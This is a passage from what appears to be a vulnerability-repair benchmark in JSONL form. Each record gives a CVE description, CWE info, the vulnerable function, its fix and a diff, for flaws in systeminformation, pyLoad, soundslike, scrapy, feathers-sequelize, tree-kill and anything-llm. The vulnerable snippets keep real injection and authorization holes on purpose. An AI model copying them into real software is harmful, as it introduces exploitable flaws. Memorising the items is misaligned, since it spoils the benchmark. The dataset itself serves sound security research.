i8021x.protocol = 'Not defined';\n return i8021x;\n }\n\n if (connectionType == 'wired' && ifaces.length > 0) {\n try {\n // Get 802.1x information by interface name\n const iface8021xInfo = ifaces.find((element) => {\n return element.includes(iface + '\\r\\n');\n });\n const arrayIface8021xInfo = iface8021xInfo.split('\\r\\n');\n const state8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('802.1x');\n });\n\n if (state8021x.includes('Disabled')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n } else if (state8021x.includes('Enabled')) {\n const protocol8021x = arrayIface8021xInfo.find((element) => {\n return element.includes('EAP');\n });\n i8021x.protocol = protocol8021x.split(':').pop();\n i8021x.state = 'Enabled';\n }\n } catch (error) {\n return i8021x;\n }\n } else if (connectionType == 'wireless') {\n\n let i8021xState = '';\n let i8021xProtocol = '';\n\n\n\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n\n let ifaceSanitized = '';\n const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(SSID);\n const l = util.mathMin(s.length, 2000);\n\n for (let i = 0; i <= l; i++) {\n if (s[i] !== undefined) {\n ifaceSanitized = ifaceSanitized + s[i];\n }\n }\n i8021xState = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"802.1X\"`, util.execOptsWin);\n i8021xProtocol = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n\n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n i8021x.state = i8021xState.split(':').pop();\n i8021x.protocol = i8021xProtocol.split(':').pop();\n }\n } catch (error) {\n if (error.status === 1 && error.stdout.includes('AutoConfig')) {\n i8021x.state = 'Disabled';\n i8021x.protocol = 'Not defined';\n }\n return i8021x;\n }\n }\n\n return i8021x;\n}"}], "vul_patch": "--- a/lib/network.js\n+++ b/lib/network.js\n@@ -2,7 +2,7 @@\n try {\n const result = execSync(`netsh wlan show interface name=\"${interfaceName}\" | findstr \"SSID\"`, util.execOptsWin);\n const SSID = result.split('\\r\\n').shift();\n- const parseSSID = SSID.split(':').pop();\n+ const parseSSID = SSID.split(':').pop().trim();\n return parseSSID;\n } catch (error) {\n return 'Unknown';\n\n--- a/lib/network.js\n+++ b/lib/network.js\n@@ -44,8 +44,18 @@\n try {\n const SSID = getWindowsWirelessIfaceSSID(iface);\n if (SSID !== 'Unknown') {\n- i8021xState = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"802.1X\"`, util.execOptsWin);\n- i8021xProtocol = execSync(`netsh wlan show profiles \"${SSID}\" | findstr \"EAP\"`, util.execOptsWin);\n+\n+ let ifaceSanitized = '';\n+ const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(SSID);\n+ const l = util.mathMin(s.length, 2000);\n+\n+ for (let i = 0; i <= l; i++) {\n+ if (s[i] !== undefined) {\n+ ifaceSanitized = ifaceSanitized + s[i];\n+ }\n+ }\n+ i8021xState = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"802.1X\"`, util.execOptsWin);\n+ i8021xProtocol = execSync(`netsh wlan show profiles \"${ifaceSanitized}\" | findstr \"EAP\"`, util.execOptsWin);\n }\n \n if (i8021xState.includes(':') && i8021xProtocol.includes(':')) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21645", "cve_description": "pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker\u2019s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77.\n", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/pyload/pyload", "patch_url": ["https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_159_1", "commit": "bb22063", "file_path": "src/pyload/webui/app/blueprints/api_blueprint.py", "start_line": 82, "end_line": 97, "snippet": "def login():\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n\n if not user_info:\n log.error(f\"Login failed for user '{user}'\")\n return jsonify(False)\n\n s = set_session(user_info)\n log.info(f\"User '{user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n return jsonify(s)"}, {"id": "vul_py_159_2", "commit": "bb22063", "file_path": "src/pyload/webui/app/blueprints/app_blueprint.py", "start_line": 47, "end_line": 78, "snippet": "def login():\n api = flask.current_app.config[\"PYLOAD_API\"]\n\n next = get_redirect_url(fallback=flask.url_for(\"app.dashboard\"))\n\n if flask.request.method == \"POST\":\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n\n if not user_info:\n log.error(f\"Login failed for user '{user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n\n set_session(user_info)\n log.info(f\"User '{user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n if is_authenticated():\n return flask.redirect(next)\n\n if api.get_config_value(\"webui\", \"autologin\"):\n allusers = api.get_all_userdata()\n if len(allusers) == 1: # TODO: check if localhost\n user_info = list(allusers.values())[0]\n set_session(user_info)\n # NOTE: Double-check authentication here because if session[name] is empty,\n # next login_required redirects here again and all loop out.\n if is_authenticated():\n return flask.redirect(next)\n\n return render_template(\"login.html\", next=next)"}], "fix_func": [{"id": "fix_py_159_1", "commit": "4159a11", "file_path": "src/pyload/webui/app/blueprints/api_blueprint.py", "start_line": 82, "end_line": 98, "snippet": "def login():\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n\n sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n log.error(f\"Login failed for user '{sanitized_user}'\")\n return jsonify(False)\n\n s = set_session(user_info)\n log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n return jsonify(s)"}, {"id": "fix_py_159_2", "commit": "4159a11", "file_path": "src/pyload/webui/app/blueprints/app_blueprint.py", "start_line": 47, "end_line": 79, "snippet": "def login():\n api = flask.current_app.config[\"PYLOAD_API\"]\n\n next = get_redirect_url(fallback=flask.url_for(\"app.dashboard\"))\n\n if flask.request.method == \"POST\":\n user = flask.request.form[\"username\"]\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n\n sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n log.error(f\"Login failed for user '{sanitized_user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n\n set_session(user_info)\n log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n\n if is_authenticated():\n return flask.redirect(next)\n\n if api.get_config_value(\"webui\", \"autologin\"):\n allusers = api.get_all_userdata()\n if len(allusers) == 1: # TODO: check if localhost\n user_info = list(allusers.values())[0]\n set_session(user_info)\n # NOTE: Double-check authentication here because if session[name] is empty,\n # next login_required redirects here again and all loop out.\n if is_authenticated():\n return flask.redirect(next)\n\n return render_template(\"login.html\", next=next)"}], "vul_patch": "--- a/src/pyload/webui/app/blueprints/api_blueprint.py\n+++ b/src/pyload/webui/app/blueprints/api_blueprint.py\n@@ -5,12 +5,13 @@\n api = flask.current_app.config[\"PYLOAD_API\"]\n user_info = api.check_auth(user, password)\n \n+ sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n- log.error(f\"Login failed for user '{user}'\")\n+ log.error(f\"Login failed for user '{sanitized_user}'\")\n return jsonify(False)\n \n s = set_session(user_info)\n- log.info(f\"User '{user}' successfully logged in\")\n+ log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n \n return jsonify(s)\n\n--- a/src/pyload/webui/app/blueprints/app_blueprint.py\n+++ b/src/pyload/webui/app/blueprints/app_blueprint.py\n@@ -8,12 +8,13 @@\n password = flask.request.form[\"password\"]\n user_info = api.check_auth(user, password)\n \n+ sanitized_user = user.replace(\"\\n\", \"\\\\n\").replace(\"\\r\", \"\\\\r\")\n if not user_info:\n- log.error(f\"Login failed for user '{user}'\")\n+ log.error(f\"Login failed for user '{sanitized_user}'\")\n return render_template(\"login.html\", next=next, errors=True)\n \n set_session(user_info)\n- log.info(f\"User '{user}' successfully logged in\")\n+ log.info(f\"User '{sanitized_user}' successfully logged in\")\n flask.flash(\"Logged in successfully\")\n \n if is_authenticated():\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-20172", "cve_description": "A vulnerability was found in ridhoq soundslike. It has been classified as critical. Affected is the function get_song_relations of the file app/api/songs.py. The manipulation leads to sql injection. The patch is identified as 90bb4fb667d9253d497b619b9adaac83bf0ce0f8. It is recommended to apply a patch to fix this issue. VDB-218490 is the identifier assigned to this vulnerability.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/ridhoq/soundslike", "patch_url": ["https://github.com/ridhoq/soundslike/commit/90bb4fb667d9253d497b619b9adaac83bf0ce0f8"], "programing_language": "Python", "vul_func": [{"id": "vul_py_339_1", "commit": "d45460ef045843c711536a4a24973d73d0aa7569", "file_path": "app/api/songs.py", "start_line": 64, "end_line": 69, "snippet": "def get_song_relations(id):\n top = request.args.get('top')\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n return make_response(jsonify(song.get_related_songs_json(top)), 200)"}], "fix_func": [{"id": "fix_py_339_1", "commit": "90bb4fb667d9253d497b619b9adaac83bf0ce0f8", "file_path": "app/api/songs.py", "start_line": 64, "end_line": 73, "snippet": "def get_song_relations(id):\n top_str = request.args.get('top')\n if not top_str.isdigit() or not int(top_str) > 0:\n message = 'top query param must be an int greater than 0'\n return bad_request(message)\n top = int(request.args.get('top'))\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n return make_response(jsonify(song.get_related_songs_json(top)), 200)"}], "vul_patch": "--- a/app/api/songs.py\n+++ b/app/api/songs.py\n@@ -1,5 +1,9 @@\n def get_song_relations(id):\n- top = request.args.get('top')\n+ top_str = request.args.get('top')\n+ if not top_str.isdigit() or not int(top_str) > 0:\n+ message = 'top query param must be an int greater than 0'\n+ return bad_request(message)\n+ top = int(request.args.get('top'))\n song = Song.query.filter_by(id=id).first()\n if not song:\n return route_not_found(song)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0577", "cve_description": "Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository scrapy/scrapy prior to 2.6.1.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/scrapy/scrapy", "patch_url": ["https://github.com/scrapy/scrapy/commit/8ce01b3b76d4634f55067d6cfdf632ec70ba304a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_49_1", "commit": "aa0306a", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 49, "end_line": 53, "snippet": " def _redirect_request_using_get(self, request, redirect_url):\n redirected = request.replace(url=redirect_url, method='GET', body='')\n redirected.headers.pop('Content-Type', None)\n redirected.headers.pop('Content-Length', None)\n return redirected"}, {"id": "vul_py_49_2", "commit": "aa0306a", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 62, "end_line": 87, "snippet": " def process_response(self, request, response, spider):\n if (\n request.meta.get('dont_redirect', False)\n or response.status in getattr(spider, 'handle_httpstatus_list', [])\n or response.status in request.meta.get('handle_httpstatus_list', [])\n or request.meta.get('handle_httpstatus_all', False)\n ):\n return response\n\n allowed_status = (301, 302, 303, 307, 308)\n if 'Location' not in response.headers or response.status not in allowed_status:\n return response\n\n location = safe_url_string(response.headers['Location'])\n if response.headers['Location'].startswith(b'//'):\n request_scheme = urlparse(request.url).scheme\n location = request_scheme + '://' + location.lstrip('/')\n\n redirected_url = urljoin(request.url, location)\n\n if response.status in (301, 307, 308) or request.method == 'HEAD':\n redirected = request.replace(url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n\n redirected = self._redirect_request_using_get(request, redirected_url)\n return self._redirect(redirected, request, spider, response.status)"}], "fix_func": [{"id": "fix_py_49_1", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 65, "end_line": 74, "snippet": " def _redirect_request_using_get(self, request, redirect_url):\n redirect_request = _build_redirect_request(\n request,\n url=redirect_url,\n method='GET',\n body='',\n )\n redirect_request.headers.pop('Content-Type', None)\n redirect_request.headers.pop('Content-Length', None)\n return redirect_request"}, {"id": "fix_py_49_2", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 83, "end_line": 108, "snippet": " def process_response(self, request, response, spider):\n if (\n request.meta.get('dont_redirect', False)\n or response.status in getattr(spider, 'handle_httpstatus_list', [])\n or response.status in request.meta.get('handle_httpstatus_list', [])\n or request.meta.get('handle_httpstatus_all', False)\n ):\n return response\n\n allowed_status = (301, 302, 303, 307, 308)\n if 'Location' not in response.headers or response.status not in allowed_status:\n return response\n\n location = safe_url_string(response.headers['Location'])\n if response.headers['Location'].startswith(b'//'):\n request_scheme = urlparse(request.url).scheme\n location = request_scheme + '://' + location.lstrip('/')\n\n redirected_url = urljoin(request.url, location)\n\n if response.status in (301, 307, 308) or request.method == 'HEAD':\n redirected = _build_redirect_request(request, url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n\n redirected = self._redirect_request_using_get(request, redirected_url)\n return self._redirect(redirected, request, spider, response.status)"}, {"id": "fix_py_49_3", "commit": "8ce01b3", "file_path": "scrapy/downloadermiddlewares/redirect.py", "start_line": 15, "end_line": 27, "snippet": "def _build_redirect_request(source_request, *, url, method=None, body=None):\n redirect_request = source_request.replace(\n url=url,\n method=method,\n body=body,\n cookies=None,\n )\n if 'Cookie' in redirect_request.headers:\n source_request_netloc = urlparse_cached(source_request).netloc\n redirect_request_netloc = urlparse_cached(redirect_request).netloc\n if source_request_netloc != redirect_request_netloc:\n del redirect_request.headers['Cookie']\n return redirect_request"}], "vul_patch": "--- a/scrapy/downloadermiddlewares/redirect.py\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -1,5 +1,10 @@\n def _redirect_request_using_get(self, request, redirect_url):\n- redirected = request.replace(url=redirect_url, method='GET', body='')\n- redirected.headers.pop('Content-Type', None)\n- redirected.headers.pop('Content-Length', None)\n- return redirected\n+ redirect_request = _build_redirect_request(\n+ request,\n+ url=redirect_url,\n+ method='GET',\n+ body='',\n+ )\n+ redirect_request.headers.pop('Content-Type', None)\n+ redirect_request.headers.pop('Content-Length', None)\n+ return redirect_request\n\n--- a/scrapy/downloadermiddlewares/redirect.py\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -19,7 +19,7 @@\n redirected_url = urljoin(request.url, location)\n \n if response.status in (301, 307, 308) or request.method == 'HEAD':\n- redirected = request.replace(url=redirected_url)\n+ redirected = _build_redirect_request(request, url=redirected_url)\n return self._redirect(redirected, request, spider, response.status)\n \n redirected = self._redirect_request_using_get(request, redirected_url)\n\n--- /dev/null\n+++ b/scrapy/downloadermiddlewares/redirect.py\n@@ -0,0 +1,13 @@\n+def _build_redirect_request(source_request, *, url, method=None, body=None):\n+ redirect_request = source_request.replace(\n+ url=url,\n+ method=method,\n+ body=body,\n+ cookies=None,\n+ )\n+ if 'Cookie' in redirect_request.headers:\n+ source_request_netloc = urlparse_cached(source_request).netloc\n+ redirect_request_netloc = urlparse_cached(redirect_request).netloc\n+ if source_request_netloc != redirect_request_netloc:\n+ del redirect_request.headers['Cookie']\n+ return redirect_request\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0577:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-0577/bin/python -m pytest tests/test_downloadermiddleware_cookies.py -k \"test_cookie_redirect_ or test_cookie_header_redirect_\" -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-0577:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/scrapy\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2022-0577/bin/python -m pytest tests/test_downloadermiddleware_cookies.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2022-2422", "cve_description": "Due to improper input validation in the Feathers js library, it is possible to perform a SQL injection attack on the back-end database, in case the feathers-sequelize package is used.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/feathersjs-ecosystem/feathers-sequelize", "patch_url": ["https://github.com/feathersjs-ecosystem/feathers-sequelize/commit/0f2d85f0b2d556f2b6c70423dcebdbd29d95e3dc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_274_1", "commit": "4c536ccc58343fe5b283016d618ad8e7fd6a1c2c", "file_path": "lib/index.js", "start_line": 122, "end_line": 159, "snippet": " _find (params = {}) {\n const { filters, query: where, paginate } = this.filterQuery(params);\n const order = utils.getOrder(filters.$sort);\n\n const q = Object.assign({\n where,\n order,\n limit: filters.$limit,\n offset: filters.$skip,\n raw: this.raw,\n distinct: true\n }, params.sequelize);\n\n if (filters.$select) {\n q.attributes = filters.$select;\n }\n\n const Model = this.applyScope(params);\n\n // Until Sequelize fix all the findAndCount issues, a few 'hacks' are needed to get the total count correct\n\n // Adding an empty include changes the way the count is done\n // See: https://github.com/sequelize/sequelize/blob/7e441a6a5ca44749acd3567b59b1d6ceb06ae64b/lib/model.js#L1780-L1782\n q.include = q.include || [];\n\n if (paginate && paginate.default) {\n return Model.findAndCountAll(q).then(result => {\n return {\n total: result.count,\n limit: filters.$limit,\n skip: filters.$skip || 0,\n data: result.rows\n };\n }).catch(utils.errorHandler);\n }\n\n return Model.findAll(q).catch(utils.errorHandler);\n }"}], "fix_func": [{"id": "fix_js_274_1", "commit": "0f2d85f0b2d556f2b6c70423dcebdbd29d95e3dc", "file_path": "lib/index.js", "start_line": 122, "end_line": 159, "snippet": " _find (params = {}) {\n const { filters, query: where, paginate } = this.filterQuery(params);\n const order = utils.getOrder(filters.$sort);\n\n const q = Object.assign({\n where,\n order,\n limit: filters.$limit,\n offset: filters.$skip,\n raw: this.raw,\n distinct: true\n }, params.sequelize);\n\n if (filters.$select) {\n q.attributes = filters.$select.map(select => `${select}`);\n }\n\n const Model = this.applyScope(params);\n\n // Until Sequelize fix all the findAndCount issues, a few 'hacks' are needed to get the total count correct\n\n // Adding an empty include changes the way the count is done\n // See: https://github.com/sequelize/sequelize/blob/7e441a6a5ca44749acd3567b59b1d6ceb06ae64b/lib/model.js#L1780-L1782\n q.include = q.include || [];\n\n if (paginate && paginate.default) {\n return Model.findAndCountAll(q).then(result => {\n return {\n total: result.count,\n limit: filters.$limit,\n skip: filters.$skip || 0,\n data: result.rows\n };\n }).catch(utils.errorHandler);\n }\n\n return Model.findAll(q).catch(utils.errorHandler);\n }"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -12,7 +12,7 @@\n }, params.sequelize);\n \n if (filters.$select) {\n- q.attributes = filters.$select;\n+ q.attributes = filters.$select.map(select => `${select}`);\n }\n \n const Model = this.applyScope(params);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-15599", "cve_description": "A Code Injection exists in tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pkrumins/node-tree-kill", "patch_url": ["https://github.com/pkrumins/node-tree-kill/commit/deee138a8cbc918463d8af5ce8c2bec33c3fd164"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_280_1", "commit": "ff73dbf144c4c2daa67799a50dfff59cd455c63c", "file_path": "index.js", "start_line": 7, "end_line": 46, "snippet": "module.exports = function (pid, signal, callback) {\n if (typeof pid !== \"number\") {\n throw new Error(\"pid must be a number\");\n }\n\n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n \n if (typeof signal === 'function' && callback === undefined) {\n callback = signal;\n signal = undefined;\n }\n\n switch (process.platform) {\n case 'win32':\n exec('taskkill /pid ' + pid + ' /T /F', callback);\n break;\n case 'darwin':\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('pgrep', ['-P', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n // case 'sunos':\n // buildProcessTreeSunOS(pid, tree, pidsToProcess, function () {\n // killAll(tree, signal, callback);\n // });\n // break;\n default: // Linux\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('ps', ['-o', 'pid', '--no-headers', '--ppid', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n }\n};"}], "fix_func": [{"id": "fix_js_280_1", "commit": "deee138a8cbc918463d8af5ce8c2bec33c3fd164", "file_path": "index.js", "start_line": 7, "end_line": 51, "snippet": "module.exports = function (pid, signal, callback) {\n if (typeof signal === 'function' && callback === undefined) {\n callback = signal;\n signal = undefined;\n }\n\n pid = parseInt(pid);\n if (Number.isNaN(pid)) {\n if (callback) {\n return callback(new Error(\"pid must be a number\"));\n } else {\n throw new Error(\"pid must be a number\");\n }\n }\n\n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n\n switch (process.platform) {\n case 'win32':\n exec('taskkill /pid ' + pid + ' /T /F', callback);\n break;\n case 'darwin':\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('pgrep', ['-P', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n // case 'sunos':\n // buildProcessTreeSunOS(pid, tree, pidsToProcess, function () {\n // killAll(tree, signal, callback);\n // });\n // break;\n default: // Linux\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('ps', ['-o', 'pid', '--no-headers', '--ppid', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n }\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,17 +1,22 @@\n module.exports = function (pid, signal, callback) {\n- if (typeof pid !== \"number\") {\n- throw new Error(\"pid must be a number\");\n+ if (typeof signal === 'function' && callback === undefined) {\n+ callback = signal;\n+ signal = undefined;\n+ }\n+\n+ pid = parseInt(pid);\n+ if (Number.isNaN(pid)) {\n+ if (callback) {\n+ return callback(new Error(\"pid must be a number\"));\n+ } else {\n+ throw new Error(\"pid must be a number\");\n+ }\n }\n \n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n- \n- if (typeof signal === 'function' && callback === undefined) {\n- callback = signal;\n- signal = undefined;\n- }\n \n switch (process.platform) {\n case 'win32':\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-10109", "cve_description": "A vulnerability in the mintplex-labs/anything-llm repository, as of commit 5c40419, allows low privilege users to access the sensitive API endpoint \"/api/system/custom-models\". This access enables them to modify the model's API key and base path, leading to potential API key leakage and denial of service on chats.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/8d302c3f670c582b09d47e96132c248101447a11"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_265_1", "commit": "dd017c6cbbf42abdef7861a66558c53b66424d07", "file_path": "server/endpoints/system.js", "start_line": 60, "end_line": 1220, "snippet": "function systemEndpoints(app) {\n if (!app) return;\n\n app.get(\"/ping\", (_, response) => {\n response.status(200).json({ online: true });\n });\n\n app.get(\"/migrate\", async (_, response) => {\n response.sendStatus(200);\n });\n\n app.get(\"/env-dump\", async (_, response) => {\n if (process.env.NODE_ENV !== \"production\")\n return response.sendStatus(200).end();\n dumpENV();\n response.sendStatus(200).end();\n });\n\n app.get(\"/setup-complete\", async (_, response) => {\n try {\n const results = await SystemSettings.currentSettings();\n response.status(200).json({ results });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/check-token\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (multiUserMode(response)) {\n const user = await userFromSession(request, response);\n if (!user || user.suspended) {\n response.sendStatus(403).end();\n return;\n }\n\n response.sendStatus(200).end();\n return;\n }\n\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User._get({ username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n // Check if the user has seen the recovery codes\n if (!existingUser.seen_recovery_codes) {\n const plainTextCodes = await generateRecoveryCodes(existingUser.id);\n\n // Return recovery codes to frontend\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n recoveryCodes: plainTextCodes,\n });\n return;\n }\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT(\n { p: new EncryptionManager().encrypt(password) },\n \"30d\"\n ),\n message: null,\n });\n }\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/request-token/sso/simple\",\n [simpleSSOEnabled],\n async (request, response) => {\n const { token: tempAuthToken } = request.query;\n const { sessionToken, token, error } =\n await TemporaryAuthToken.validate(tempAuthToken);\n\n if (error) {\n await EventLogs.logEvent(\"failed_login_invalid_temporary_auth_token\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: true,\n });\n return response.status(401).json({\n valid: false,\n token: null,\n message: `[001] An error occurred 